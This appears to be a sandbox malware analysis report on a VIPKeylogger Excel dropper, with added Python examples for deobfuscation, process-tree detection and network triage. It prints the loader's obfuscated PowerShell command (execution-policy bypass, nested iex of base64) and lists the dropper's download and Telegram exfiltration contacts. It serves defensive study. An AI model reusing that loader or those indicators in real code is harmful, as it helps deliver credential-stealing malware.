Malware Analysis Report

2025-05-28 14:54

Sample ID: 240821-lttnta1hld
Target: 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls
SHA256: 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72
Tags: vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10
SHA256: 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72
Threat Level: Known bad

The file 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx

VIPKeylogger

Process spawned unexpected child process

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

outlook_office_path

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks processor information in registry

outlook_win_path

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-21 09:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-21 09:49
Reported: 2024-08-21 09:52
Platform: win7-20240729-en
Max time kernel: 122s
Max time network: 143s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Note: this signature matches the token DeVICecREdEnTIaLDEpLOYMENT that the loader passes to powershell.exe -C ahead of the ";" (see the cmd.exe and powershell.exe command lines under Processes). It is not a cmdlet or alias: PowerShell reports a CommandNotFound error for it and, because that error terminates only the statement it occurs in and not the script, goes on to run the iEX(...) statement that follows. The report does not establish why the loader includes the token; treat it as a command-line marker for this loader rather than as an evasion primitive in its own right.
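The PowerShell command line this signature fires on (reproduced under Processes) builds its real payload at run time: every [chAR]0X3a / [ChAr]58 cast evaluates to one character, the + joins concatenate the pieces into the text [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")), the inner iex evaluates that text to recover the next stage as a string, and the outer iEX executes it. The base64 blob itself is not reproduced on this page. The Python below is an added example written for this page, not code from the report or from the malware author: it undoes those steps statically, without running PowerShell, and is exercised on a constructed command line that has the report's exact shape with a harmless placeholder payload where the elided blob would be. The switch expansions (-Ex, -noP, -W, -C) follow PowerShell's own abbreviated-parameter matching; the function names and the placeholder are this example's assumptions.

```python
import base64
import re

# Constructed sample: the loader's shape as printed in this report, with a harmless
# placeholder in place of the base64 blob the report does not reproduce.
PLACEHOLDER_PAYLOAD = base64.b64encode(b'Write-Host "stage-2 placeholder"').decode()
SAMPLE_CMDLINE = (
    "pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; "
    "iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'"
    "+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'" + PLACEHOLDER_PAYLOAD
    + "'+[chAr]34+'))')))"
)

CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
INNER_IEX = re.compile(r"iex\(\s*'((?:[^']|'')*)'\s*\)", re.IGNORECASE)
FROM_B64 = re.compile(r"FromBase64String\(\s*\"([A-Za-z0-9+/=]+)\"\s*\)", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of a parameter name; these are the prefixes this loader uses.
SWITCHES = {"ex": "ExecutionPolicy", "nop": "NoProfile", "w": "WindowStyle", "c": "Command"}


def resolve_char_casts(expr: str) -> str:
    """Turn every [char]58 / [char]0x3a cast into the quoted one-character literal it evaluates to."""
    # int(x, 0) accepts both decimal and 0x-prefixed hex, as the PowerShell cast does.
    return CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", expr)


def fold_concat(expr: str) -> str:
    """Collapse 'a'+'b' into 'ab', which is what PowerShell's + does on string literals."""
    return re.sub(r"'\s*\+\s*'", "", expr)


def normalize_switches(cmdline: str) -> dict:
    """Expand the abbreviated switches before the first ';' to their full parameter names."""
    head = cmdline.split(";", 1)[0]
    out = {}
    for m in re.finditer(r"-(\w+)(?:\s+(?!-)(\S+))?", head):
        name = SWITCHES.get(m.group(1).lower(), m.group(1))
        out[name] = m.group(2) if m.group(2) is not None else True
    return out


def deobfuscate(cmdline: str) -> dict:
    """Recover the stage-1 expression and the decoded stage-2 script without executing anything."""
    folded = fold_concat(resolve_char_casts(cmdline))
    inner = INNER_IEX.search(folded)
    if inner is None:
        raise ValueError("no iex('...') string-building stage found")
    stage1 = inner.group(1)
    blob = FROM_B64.search(stage1)
    if blob is None:
        raise ValueError("stage-1 expression does not decode a base64 blob")
    stage2 = base64.b64decode(blob.group(1)).decode("utf-8")
    return {"switches": normalize_switches(cmdline), "stage1": stage1, "stage2": stage2}


if __name__ == "__main__":
    for key, value in deobfuscate(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

On a real capture, paste the powershell.exe command line in place of SAMPLE_CMDLINE; if the blob decodes to another concatenation-built iex, run deobfuscate again on the stage-2 text. A [char] cast that evaluates to a single quote would break fold_concat's quoting and needs the literal escaped ('') first.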

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

UPX packed file

upx
Three hits; the report records no description, indicator, process or target for them (all N/A).

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

AutoIT Executable

One hit; the report records no description, indicator, process or target for it (all N/A).

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Note: the %ProgramData% segment is an unexpanded environment variable, so the path resolved relative to the working directory (C:\Windows\SysWOW64) and the "System32" hit is most likely a side effect of that rather than a deliberate write into a system directory. Nothing in this report shows a payload under C:\Windows; the dropped executable lands in C:\Users\Admin\AppData\Roaming\ctfmon.exe.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 332 set thread context of 2360 | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Note: together with the repeated WriteProcessMemory from 332 into 2360 (below) and the RegSvcs.exe command line that names ctfmon.exe (Processes), this is the process-hollowing pattern: the dropper starts a legitimate .NET host, overwrites its memory and redirects its main thread with SetThreadContext. That is why the stealer activity (Outlook profile keys, SeDebugPrivilege) is attributed to RegSvcs.exe: the payload runs there.

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ctfmon.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A (x2) | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A (x2) | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1904 wrote to memory of 1296 (x4) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 1296 wrote to memory of 1676 (x4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 572 (x4) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 572 wrote to memory of 1604 (x4) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 332 (x4) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\ctfmon.exe
PID 332 wrote to memory of 2360 (x8) | N/A | C:\Users\Admin\AppData\Roaming\ctfmon.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
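The rows above are enough to rebuild the lineage mshta.exe -> cmd.exe -> powershell.exe -> {csc.exe -> cvtres.exe, ctfmon.exe -> RegSvcs.exe} and to state, as rules, the detections a hunter would want from it. The Python below is an added example written for this page, not output of the sandbox: it parses rows in the report's own "PID X wrote to memory of Y" format (the six distinct edges above, transcribed with duplicates dropped), takes the image/command-line pairs for three PIDs from the Processes list further down, and flags the mshta/cmd/powershell hand-off, PowerShell invoking csc.exe (Add-Type compiling C# at run time, which is why csc.exe and cvtres.exe appear in the tree), a Windows binary name executing from outside C:\Windows, and a process whose on-disk image disagrees with the image its own command line names. It assumes, as the report's format implies, that a parent writing into a freshly created child is how process creation surfaces here; the rule names and the list of Windows binary names are this example's own.

```python
import re

# Edges transcribed from the WriteProcessMemory table above, duplicates dropped. In these
# reports a parent writing into a freshly created child is how process creation surfaces,
# so each row is read as a parent -> child edge (an assumption of this example).
WPM_ROWS = [
    r"PID 1904 wrote to memory of 1296 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe",
    r"PID 1296 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"PID 1676 wrote to memory of 572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
    r"PID 572 wrote to memory of 1604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
    r"PID 1676 wrote to memory of 332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ctfmon.exe",
    r"PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
]
# (image on disk, command line) for the PIDs whose command lines the Processes list gives.
CMDLINES = {
    1904: (r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    332: (r"C:\Users\Admin\AppData\Roaming\ctfmon.exe", r'"C:\Users\Admin\AppData\Roaming\ctfmon.exe"'),
    2360: (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", r'"C:\Users\Admin\AppData\Roaming\ctfmon.exe"'),
}
WPM = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$", re.IGNORECASE)
LOLBIN_HANDOFF = ("mshta.exe", "cmd.exe", "powershell.exe")
# Names that belong under C:\Windows; a copy elsewhere is masquerading (T1036.005). Extend as needed.
WINDOWS_NAMES = {"ctfmon.exe", "regsvcs.exe", "svchost.exe", "explorer.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(rows):
    """Return (parent_of, image_of) maps built from report rows; unparsable rows are skipped."""
    parent_of, image_of = {}, {}
    for row in rows:
        m = WPM.match(row)
        if m is None:
            continue
        ppid, pid = int(m.group(1)), int(m.group(2))
        parent_of[pid] = ppid
        image_of.setdefault(ppid, m.group(3))
        image_of[pid] = m.group(4)
    return parent_of, image_of


def lineage(parent_of, image_of, pid):
    """Image basenames from the topmost known ancestor down to pid."""
    chain, seen = [], set()
    while pid in image_of and pid not in seen:
        seen.add(pid)
        chain.append(basename(image_of[pid]))
        pid = parent_of.get(pid)
    return chain[::-1]


def first_image(cmdline: str) -> str:
    """The executable a command line names: the quoted first token, or the first bare token."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def detect(parent_of, image_of, cmdlines):
    """Rule hits as (pid, rule) pairs; the rule names are this example's own."""
    hits = set()
    for pid, image in image_of.items():
        chain = lineage(parent_of, image_of, pid)
        name = chain[-1]
        # mshta -> cmd -> powershell: three LOLBins handing off to each other
        if tuple(chain[-3:]) == LOLBIN_HANDOFF:
            hits.add((pid, "lolbin_handoff"))
        # PowerShell starting the C# compiler: Add-Type compiling code at run time
        if name == "csc.exe" and chain[-2:-1] == ["powershell.exe"]:
            hits.add((pid, "runtime_compile"))
        # A Windows binary name executing from outside C:\Windows
        if name in WINDOWS_NAMES and not image.lower().startswith("c:\\windows\\"):
            hits.add((pid, "masquerade"))
        # The on-disk image disagrees with the image the command line names: hollowing suspect
        if pid in cmdlines:
            on_disk, cmdline = cmdlines[pid]
            if basename(on_disk) != basename(first_image(cmdline)):
                hits.add((pid, "cmdline_image_mismatch"))
    return hits


if __name__ == "__main__":
    parent_of, image_of = build_tree(WPM_ROWS)
    for pid in sorted(image_of):
        print(pid, " -> ".join(lineage(parent_of, image_of, pid)))
    for hit in sorted(detect(parent_of, image_of, CMDLINES)):
        print(*hit)
```

The cmdline_image_mismatch rule is the cheapest of the four to port to EDR telemetry, since process-creation events carry both the image path and the command line; the lineage rules need the parent chain, which most sensors also record.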

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'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'+[chAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'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'+[chAr]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp"

C:\Users\Admin\AppData\Roaming\ctfmon.exe

"C:\Users\Admin\AppData\Roaming\ctfmon.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\ctfmon.exe"

(The command line is the one the injecting parent, PID 332, supplied when it created this process; the on-disk image and the command line disagree, which is the simplest telemetry check for the hollowing recorded under SetThreadContext.)

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | ir.cx | udp
US | 104.21.76.154:443 | ir.cx | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
FR | 216.58.214.163:80 | c.pki.goog | tcp
NL | 45.66.231.209:80 | 45.66.231.209 | tcp
US | 104.21.76.154:443 | ir.cx | tcp
NL | 45.66.231.209:80 | 45.66.231.209 | tcp
NL | 45.66.231.209:80 | 45.66.231.209 | tcp
US | 8.8.8.8:53 | checkip.dyndns.org | udp
JP | 132.226.8.169:80 | checkip.dyndns.org | tcp
US | 8.8.8.8:53 | reallyfreegeoip.org | udp
US | 104.21.67.152:443 | reallyfreegeoip.org | tcp
US | 8.8.8.8:53 | api.telegram.org | udp
NL | 149.154.167.220:443 | api.telegram.org | tcp
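Most rows above are not attacker infrastructure: the 8.8.8.8:53 rows are the sandbox resolver, and c.pki.goog is Google's certificate-status endpoint. What remains is the order of contact: an HTTPS host (ir.cx), repeated direct-to-IP HTTP to 45.66.231.209 with no DNS lookup at all, then checkip.dyndns.org, reallyfreegeoip.org and api.telegram.org in sequence, which is the external-IP check, geolocation and Telegram Bot API exfiltration trio the VIPKeylogger tag refers to. The Python below is an added example, not part of the report, that parses the report's own network rows (transcribed inline), drops resolver, reverse-DNS and benign-infrastructure noise, lists distinct destinations in first-seen order with hit counts and an ATT&CK technique, and returns a verdict when the trio is present. The noise list and the technique mapping are this example's assumptions; the rows are the ones above.

```python
import re
from collections import OrderedDict

# The behavioral1 network table above, transcribed verbatim (country, destination, domain, protocol).
NETWORK_ROWS = """\
US 8.8.8.8:53 ir.cx udp
US 104.21.76.154:443 ir.cx tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 104.21.76.154:443 ir.cx tcp
NL 45.66.231.209:80 45.66.231.209 tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
JP 132.226.8.169:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
"""

# Hosts a Windows/Office sandbox contacts on its own (assumption: extend for your environment).
BENIGN_INFRA = {"c.pki.goog", "roaming.officeapps.live.com", "tse1.mm.bing.net"}
# Public services this stealer family uses, with the ATT&CK technique this example maps them to.
SERVICE_TAGS = {
    "checkip.dyndns.org": ("external-ip-check", "T1016.001"),
    "reallyfreegeoip.org": ("geolocation", "T1614"),
    "api.telegram.org": ("telegram-bot-api", "T1567"),
}
EXFIL_TRIO = {"external-ip-check", "geolocation", "telegram-bot-api"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_rows(text: str):
    """Yield one dict per well-formed row; the header line and blank lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or ":" not in parts[1]:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        yield {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def classify(event: dict):
    """(tag, technique) for one row; a None technique means the row is not an indicator."""
    domain = event["domain"]
    if domain.endswith(".in-addr.arpa"):
        return ("reverse-dns-noise", None)
    if event["port"] == 53 and event["proto"] == "udp":
        return ("dns-lookup", None)               # the matching TCP row carries the real contact
    if domain in BENIGN_INFRA:
        return ("benign-infra", None)
    if domain in SERVICE_TAGS:
        return SERVICE_TAGS[domain]
    if IPV4.match(domain):
        return ("direct-to-ip-http", "T1071.001")  # no DNS at all: a hard-coded download host
    return ("unclassified-external", "T1071.001")


def contacts(text: str):
    """Distinct indicator destinations in first-seen order, with hit counts."""
    seen = OrderedDict()
    for ev in parse_rows(text):
        tag, technique = classify(ev)
        if technique is None:
            continue
        key = f"{ev['domain']}:{ev['port']}"
        entry = seen.setdefault(key, {"ip": ev["ip"], "country": ev["country"],
                                      "tag": tag, "technique": technique, "hits": 0})
        entry["hits"] += 1
    return seen


def exfil_pattern(cont) -> bool:
    """True when the IP-check, geolocation and Telegram contacts are all present."""
    return EXFIL_TRIO <= {v["tag"] for v in cont.values()}


if __name__ == "__main__":
    found = contacts(NETWORK_ROWS)
    for key, v in found.items():
        print(f"{key:28} {v['ip']:16} {v['country']} {v['tag']:22} {v['technique']} x{v['hits']}")
    print("stealer exfil trio present:", exfil_pattern(found))
```

The verdict deliberately keys on the trio rather than on any single host: checkip.dyndns.org on its own is common in legitimate software, and the Telegram API is used by benign clients, but the three in one short-lived process chain is the signal.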

Files

memory/2412-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

memory/2412-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1904-17-0x0000000001170000-0x0000000001172000-memory.dmp

memory/2412-18-0x0000000002510000-0x0000000002512000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SDPZEA0W.txt

MD5 8c8f0be7cca815cb1fbf2dcf6077ae2f
SHA1 7017fb0ac1192d732b1b201d8ce4d98c2d89624c
SHA256 ee3b7c3bced350c1eb975a706b612d5f63810ff9219e5e25726821d3867c86b8
SHA512 607e8e676162965cb49fb09d9e621d31af80479126ece5fa90df3b3118ef9a273aaffa5a61c19a42d82585d94ebee0688bc32e422e6330d880a13b310deb05f9

C:\Users\Admin\AppData\Local\Temp\Cab11DC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 b45fbb9ce0d2f1e273b0998784d91bc2
SHA1 4f516b2eddefca55966d604b112e67475c5ff4a4
SHA256 2fd34f3dab3327d1ea8b51beb38848e58e96734f32973a386ff52326ec7f3112
SHA512 cba01a4c0d5793e2c0b799223aa7e380b2b99787824bbab5eeae2b987e7730ae1d175c3b5766838aa6bf2959afca493075fcf02f3a1131b5c2c10abc4c538824

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 7fb5fa1534dcf77f2125b2403b30a0ee
SHA1 365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA256 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512 a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 cf3bd07399be9f4084372184779c0335
SHA1 cf61b1f8e6031e277dc6702aefab4547aba41c12
SHA256 7072ef60a408d2ff9b84080ea6712917fa27a384b201df0aa1032f7a1331dd11
SHA512 7bf7d4e2bb83dcd06c5673f8266d4f9b87b8acf72faba60db4358521d03076cb10923946300a5e46828797a8e0cc786a7627b7f24436b634d28b2fb818de8067

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\ienetsat[1].hta

MD5 c874a7cd1ef60df49ffa191421406a09
SHA1 8ea6515cf44c728d29fe179719602346e96280a3
SHA256 b72942e91327de4efa1e5741123e4bd83b03602d3546f6727499a7e8770e6683
SHA512 b06ed3b136d5acb2699927a7ec636fb6149781b4ba47eb25e81dd040d71a01872bdeb6be4afb68792354ad4a3e4eca9c44e4b4497da57d7b5e99f69494ddb667

\??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline

MD5 3b34610a3ca9d4f87d2d3a060862a43b
SHA1 58d5fd8d37d1e59929d497a237e4c9cf35bd7f99
SHA256 f9ef5a8e7ae4c313a0bbee5a101ef6ba990ee1a304fc1d1b8a60e74b9d6d6743
